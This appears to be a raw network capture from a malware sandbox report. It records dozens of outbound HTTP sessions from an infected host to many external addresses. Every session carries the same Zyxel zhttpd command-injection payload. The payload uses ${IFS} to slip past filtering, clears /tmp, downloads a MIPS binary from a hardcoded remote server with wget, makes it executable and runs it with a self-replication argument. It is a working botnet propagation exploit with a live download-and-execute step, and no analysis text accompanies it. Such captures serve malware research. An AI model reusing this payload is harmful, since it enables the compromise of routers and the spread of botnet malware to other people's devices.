                                          Jan 14, 2024 15:46:30.309374094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7683192.168.2.235466677.180.229.32443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309395075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7684192.168.2.2342056113.50.78.156443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309422016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7685192.168.2.2347278151.225.218.204443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309453011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7686192.168.2.2336232152.249.98.197443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309484959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7687192.168.2.234431248.111.35.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309495926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7688192.168.2.234143880.171.45.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309534073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7689192.168.2.2347364147.60.165.202443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309540987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7690192.168.2.2352402122.112.129.189443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309595108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7691192.168.2.233434441.69.27.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309602976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7692192.168.2.2345462109.228.169.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309650898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7693192.168.2.2355242159.136.174.133443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309653997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7694192.168.2.2342380184.131.89.40443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309658051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7695192.168.2.2334880123.156.43.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309689045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7696192.168.2.2359294154.240.137.70443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309730053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7697192.168.2.2334374110.194.36.83443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309755087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7698192.168.2.2336214136.1.253.183443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309773922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7699192.168.2.234563641.42.210.98443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309794903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7700192.168.2.2351342180.225.45.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309830904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7701192.168.2.235270632.127.55.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309830904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7702192.168.2.2337710193.57.32.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309864998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7703192.168.2.2350442197.80.157.216443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309901953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7704192.168.2.235958435.119.56.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309917927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7705192.168.2.235387486.146.187.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309933901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7706192.168.2.2341482156.4.183.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309935093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7707192.168.2.2345330163.93.149.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.309978962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7708192.168.2.234523860.62.13.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310003042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7709192.168.2.2348428121.12.176.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310013056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7710192.168.2.234949695.52.24.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310045958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7711192.168.2.235188052.179.26.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310059071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7712192.168.2.235732683.250.71.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310070992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7713192.168.2.234127687.175.150.139443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310111046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7714192.168.2.233810467.164.232.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310151100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7715192.168.2.2334464210.249.142.119443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310179949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7716192.168.2.2357168143.6.126.51443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310201883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7717192.168.2.2341624123.248.150.154443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310241938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7718192.168.2.233805237.127.224.162443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310275078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7719192.168.2.2340408107.223.118.163443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310292959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7720192.168.2.234579675.186.1.199443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310317039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7721192.168.2.2353236140.244.240.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310328007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7722192.168.2.233453820.55.120.43443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310379982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7723192.168.2.2336050219.112.187.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310379982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7724192.168.2.2347844106.231.29.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310409069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7725192.168.2.235808417.201.117.104443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310453892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7726192.168.2.2356170199.67.87.54443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310467958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7727192.168.2.2356826118.53.23.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310522079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7728192.168.2.2346744103.58.57.211443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310534954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7729192.168.2.2358760190.173.50.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310553074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7730192.168.2.2345564150.46.20.124443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310587883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7731192.168.2.2346414188.94.27.225443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310619116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7732192.168.2.233342812.208.203.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310651064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7733192.168.2.235949888.253.207.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310707092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7734192.168.2.2339652180.248.32.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310715914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7735192.168.2.234366886.147.152.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310745955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7736192.168.2.2333386158.11.175.48443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310755968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7737192.168.2.2343594222.188.125.224443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310769081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7738192.168.2.2334744113.123.136.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310817957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7739192.168.2.234896879.92.80.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310848951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7740192.168.2.235988486.192.95.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310868979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7741192.168.2.2333084204.120.221.53443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310898066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7742192.168.2.2332920218.121.140.146443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310915947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7743192.168.2.235501891.53.213.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310976982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7744192.168.2.234333473.164.115.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:30.310990095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7745192.168.2.2356242209.173.243.80443
                                          TimestampBytes transferredDirectionData
